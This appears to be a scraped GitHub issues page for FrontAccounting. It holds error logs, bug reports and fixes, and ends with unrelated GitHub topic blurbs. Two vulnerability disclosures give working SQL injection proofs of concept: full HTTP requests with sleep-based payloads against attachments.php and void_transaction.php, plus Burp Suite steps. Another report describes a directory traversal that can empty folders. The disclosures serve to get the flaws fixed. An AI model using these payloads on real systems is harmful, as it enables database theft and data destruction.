[02-Nov-2016 21:53:21 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 22:11:33 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(../lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:11:33 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening '../lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::config.php:65: filemtime(): stat failed for ./CHANGELOG.txt
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(./tmp/faillog.php): failed to open stream: No such file or directory
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::session.inc:401: include_once(): Failed opening './tmp/faillog.php' for inclusion (include_path='.:')
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::current_user.inc:607: Invalid argument supplied for foreach()
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(./company/0/installed_extensions.php): failed to open stream: No such file or directory
[02-Nov-2016 22:11:34 EST5EDT] [client 67.6.186.36 ] 0::session.inc:449: include_once(): Failed opening './company/0/installed_extensions.php' for inclusion (include_path='.:')
[02-Nov-2016 22:33:36 EST5EDT] [client 67.6.186.36 ] PHP Parse error: syntax error, unexpected 'the' (T_STRING) in /big/dom/xkaluwellaco/www/accounting/includes/session.inc on line 17
[02-Nov-2016 22:35:05 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(../lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:35:05 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening '../lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:35:05 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function add_js_file() in /big/dom/xkaluwellaco/www/accounting/access/logout.php on line 18
[02-Nov-2016 22:37:17 EST5EDT] [client 67.6.186.36 ] PHP Parse error: syntax error, unexpected 'FA2' (T_STRING) in /big/dom/xkaluwellaco/www/accounting/config.php on line 218
[02-Nov-2016 22:38:52 EST5EDT] [client 67.6.186.36 ] PHP Parse error: syntax error, unexpected '*' in /big/dom/xkaluwellaco/www/accounting/config.php on line 218
[02-Nov-2016 22:40:36 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:40:36 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:40:36 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function add_access_extensions() in /big/dom/xkaluwellaco/www/accounting/index.php on line 20
[02-Nov-2016 22:41:39 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:41:39 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:41:39 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Function name must be a string in /big/dom/xkaluwellaco/www/accounting/index.php on line 20
[02-Nov-2016 22:43:24 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:43:24 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:43:24 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Function name must be a string in /big/dom/xkaluwellaco/www/accounting/index.php on line 20
[02-Nov-2016 22:46:51 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 22:46:51 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 22:46:51 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function add_access_extensions() in /big/dom/xkaluwellaco/www/accounting/index.php on line 20
[02-Nov-2016 23:06:18 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(./lang/installed_languages.inc): failed to open stream: No such file or directory
[02-Nov-2016 23:06:18 EST5EDT] [client 67.6.186.36 ] ::language.php:15: include_once(): Failed opening './lang/installed_languages.inc' for inclusion (include_path='.:')
[02-Nov-2016 23:06:18 EST5EDT] [client 67.6.186.36 ] PHP Fatal error: Call to undefined function add_access_extensions() in /big/dom/xkaluwellaco/www/accounting/index.php on line 20
Is it technically and possible and feasible to integrate FA with a web-based user management system written in other technologies (e.g. Django) where the users will enter data in FA through that system ? Any FA API or anything similar on that line?
In 2.4RC1 (unstable branch) the bank transfer reference is incorrect when editing an existing bank transfer.
FYI. The implementation of ref_cells forces initialization on every GET request. This is not likely to be valid for an edit operation.
Vulnerability Name: Time Based Blind SQL Injection in "filterType" Parameter
Vulnerability Description: filterType Parameter in admin/attachments.php file suffer from the Blind SQL Injection, By using the an attacker can grab the Backend Database Information
PoC:
POST /frontaccounting/admin/attachments.php? HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/frontaccounting/admin/attachments.php?
Content-Type: application/x-www-form-urlencoded
Content-Length: 365
DNT: 1
Connection: close
Cookie: user_auth=eyJpdiI6Iit2SUhqY0JUSzNxUjd3ZnVNUHhodVE9PSIsInZhbHVlIjoiaHdFNVo3MkhUNTVVcmRFMGFkK01meURSZXhFank3dHUzajZQd3hOZlNSaFdBOUNBQm1aQ2JOU2lLZ1VGYllLOXc0S2hXVXRVcCtqMUZcL3pZUmRXSkJLcGQ3U3RGanE2MVZBa0Y3UnZST2RqQVoxVXd0NXJoaWVDekZpODJWdUJSIiwibWFjIjoiZDQ5YTEzYWM0MzkxMDA4YWMzYjE1ODMwMzViODA0YWJiN2Y3N2I3NGQ1NzE4MTM4NTBhODg5NDVjYzRhN2I4YiJ9; sidenav_treesearch=; sidenav_treegroupStatus=%7Csystem%3A%3Alang.system.categories.mail; xoadmstyle=dark; phpbb3_6s8qf_k=; phpbb3_6s8qf_u=2; phpbb3_6s8qf_sid=32cc1d499e0c4a892a18c7f94a7260c0; postfixadmin_session=chgajr17kqam68bkgo3jd43a7o; FAea2c25b156a4d770f5eb3b4a876d1c4a=rt053p1poe6cvniu5qg6t01omc; FAinstall=akcghq3qcueic1f0nevsn63qcm
Upgrade-Insecure-Requests: 1
user_name_entry_field=admin&password=1234&company_login_name=0&ui_mode=1&SubmitUser=%A0%A0Login+--%3E%A0%A0&_random=831749.090143524&_token=1RJ9WhkRWKszXu-uPm6DTQxx&_confirmed=&_modified=0&_focus=filterType&ADD_ITEM=Add+new&description=&trans_no=&filterType=(select*from(select(sleep(20)))a)&_focus=filterType&_modified=0&_confirmed=&_token=Om-2mt32ZC3UkLAuzPwoFgxx
Step1: Open the Burp Suite go to the Repeater tab copy the above Contents
Step2: Click on the right side penlike icon configure the your ipaddress and port address and click save
Step3: Click on "Go" Button you will see the response cause the time delay 20 seconds.
Step4: Change the sleep function value what ever you want and click on "go" you will see the time delay what ever you give value to the sleep function.
PoC Video:
Mitigation: See the OWASP SQL Injection Prevention sheet on this https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Frontaccounting is using the function clean_file_name() to eliminate '../' in the file name submitted by the user to avoid directory traversal vulnerability.
However, some variables do not use the function clean_file_name() in admin/inst_lang.php, which can cause attackers submit the language package containing the language code of '../'. Affter adding successfully, by deleting it, the attacker can emptied specified folder like the examples.
admin/inst_lang.php:156
FA 2.3 branch should have been made into a separate branch say old-stable like in SF-git.
The FA 2.4 CHANGELOG is now messed up with FA 2.3 changes mixed into it.
Mixing up FA 2.4 as master with 2.3 commits will make finding old 2.3 commits difficult.
The unstable will now become FA 2.5 (or get frozen at FA 2.4.1 for a while) and would make finding old FA 2.4 commits difficult as well.
Customer Balances report is not correct for Journal Entry data But its' correct for Aged Customer Analysis report.
The fix is in the /reporting/rep101.php file:
Line 37-41:
$sql = "SELECT SUM(IF(t.type = ".ST_SALESINVOICE." OR t.type = ".ST_JOURNAL.",
abs(t.ov_amount + t.ov_gst + t.ov_freight + t.ov_freight_tax + t.ov_discount), 0)) AS charges,";
$sql .= "SUM(IF(t.type != ".ST_SALESINVOICE." AND t.type != ".ST_JOURNAL.",
abs(t.ov_amount + t.ov_gst + t.ov_freight + t.ov_freight_tax + t.ov_discount), 0)) AS credits,";
$sql .= "SUM(IF(t.type != ".ST_SALESINVOICE." AND t.type != ".ST_JOURNAL.", t.alloc, -t.alloc)) AS Allocated,";
Line 75:
abs(trans.ov_amount + trans.ov_gst + trans.ov_freight + trans.ov_freight_tax + trans.ov_discount) AS TotalAmount,
Line 231:
if ($trans['type'] == ST_SALESINVOICE || $trans['type'] == ST_BANKPAYMENT || $trans['type'] == ST_JOURNAL)
Line 74 in errors.inc produces a notice level warning on every page load.
Sorry,This is my first time to chat with people in English.
Frontaccounting is using function db_escape() to escape value. But some variables do not use the function db_escape().
environment : docker mattrayner/lamp:latest-1604
includes/db/class.reflines_db.inc:156
If I set parameter $reference like ‘XXXXXX\’. Single quotes can escape.And I can inject in parameter $type
includes/references.inc:365
admin/db/voiding_db.inc:127
admin/void_transaction.php:316
admin/void_transaction.php:352
So parameter $type can be controlled
How about parameter $reference?
get_systype_db_info()
After that I found some insert statements of table grn_batch.
purchasing/includes/db/grn_db.inc:170
purchasing/includes/db/grn_db.inc:99
purchasing/po_receive_items.php:254
So parameter $reference can be controlled
Settings such as ‘001/2018\’ will report an error, but ‘001/2018\’ will not . I noticed that refererence is 60 bytes, set the payload to 61 bytes like 001100422222222222222222222201700422222222222222212222/2018\\.it is 001100422222222222222222222201700422222222222222212222/2018\ in the database.
I am using po_entry_items.php, not the po_receive_items.php found above.
POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3
supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463
POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0
filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072
The final execution of the sql statement is like this:
SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''
I'm getting the following unit test failures on the unstable implementation of the bank transfer and bank transfer edit feature.
See #5 for the test code.
/shared/src/sgw/frontaccounting/modules/tests/php/GLBankTransfer_Test.php:152
/shared/src/sgw/frontaccounting/modules/tests/php/GLBankTransfer_Test.php:231
/shared/src/sgw/frontaccounting/modules/tests/php/GLBankTransfer_Test.php:309
/shared/src/sgw/frontaccounting/modules/tests/php/GLBankTransfer_Test.php:346
FAILURES!
Tests: 7, Assertions: 28, Failures: 4.
The commit 99df2fb has two many commas on line 312
2f3375b#commitcomment-44633990
Line 347 in gl/includes/db/gl_db_bank_accounts.inc
:
$id = $row ? get_default_bank_account($row[0])['id'] : 0;
is valid for PHP >= 5.4.
For older versions of PHP like 5.3.3, etc, replace the said line with:
$id = 0;
if ($a = get_default_bank_account($row[0])) {
$id = $a['id'];
unset ($a);
}
Dear FrontAccounting,
Thank you very much for this wonderful software.
I already opened ticket: http://mantis.frontaccounting.com/view.php?id=3376
Currently we are facing issue when placing a direct invoice with large number of product items on FrontAccounting 2.3.24.
I enabled the debug option with 2 in config file but the error is not displaying just an exclamation indicator.
Apparently direct invoice generates successfully despite the error but page does not updates.
We have 500+ products listings and database size 30MB+.
I attached the screenshot when I was placing direct invoice with more than 40 products.
I configured php with set_time_limit(500) but error still occurs.
I look forward for your support at your earliest convenience.
Regards,
M Shahbaz
Sometimes I find that the value of some items in the remaining stock are over or under so much more than what they should be. After digging into the data I found that there are some records in stock_moves
that has wrong value of standard_cost
when we sell that item. (I means it happens with the transaction of delivery note.) The values are just much higher or lower than the last one above without reason or clue to find the cause.
I found a case that it was the total cost of that item (quantity x price) rather than the value of each, and the same wrong value is stamped in debtor_tran_details
of delivery note while the value in debtor_tran_details
of invoice is correctly the value of each item.
Sometimes it is not rational to any value around it and I had no clue to investigate the case.
The values in stock_moves
are used to inserted as COGS account in gl_trans
so it makes the stock valuation much higher or lower than it should be. And as the last one will be used with the next next transactions, so it makes the coming COGS transactions wrongly recorded.
I tried to find the code that calculating this standard cost so I might be able to correct it but it is not successful yet.
I will capture some examples and put here later soon.
In my case the customer credit limit calculation:
The fix:
-1, 1
to 1, -1
I've tested the SQL query using the unswitched version and the result was wrong.
After I switched the position, the SQL query result was correct.
I've fixed this in my code and it's working properly right now.
Hey there!
I belong to an open source security research community, and a member (@0x7zed) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md
file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
Issue:
The document (or order) date in view_sales_order.php always shows the current date, whatever the real value is in the db
Cause:
The document_date variable is set to today when preparing the SO children data in view_sales_order.php line 145:
$this->document_date = new_doc_date();
Fix:
Comment out the line, so the document_date won't be changed:
// $this->document_date = new_doc_date();
When the form data is sent to php the checkbox value is unset. It would be better if the value was set with value 0.
Thh
I believed this was fixed where Salesmen was replaced with Salesperson to de-genderize the entity.
includes/dashboard.inc - Line 186
echo "<div class='square square1'>"._('Salesperson')."<p class='span1'>";
echo "<div class='square square1'>"._('Salesmen')."<p class='span1'>";
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.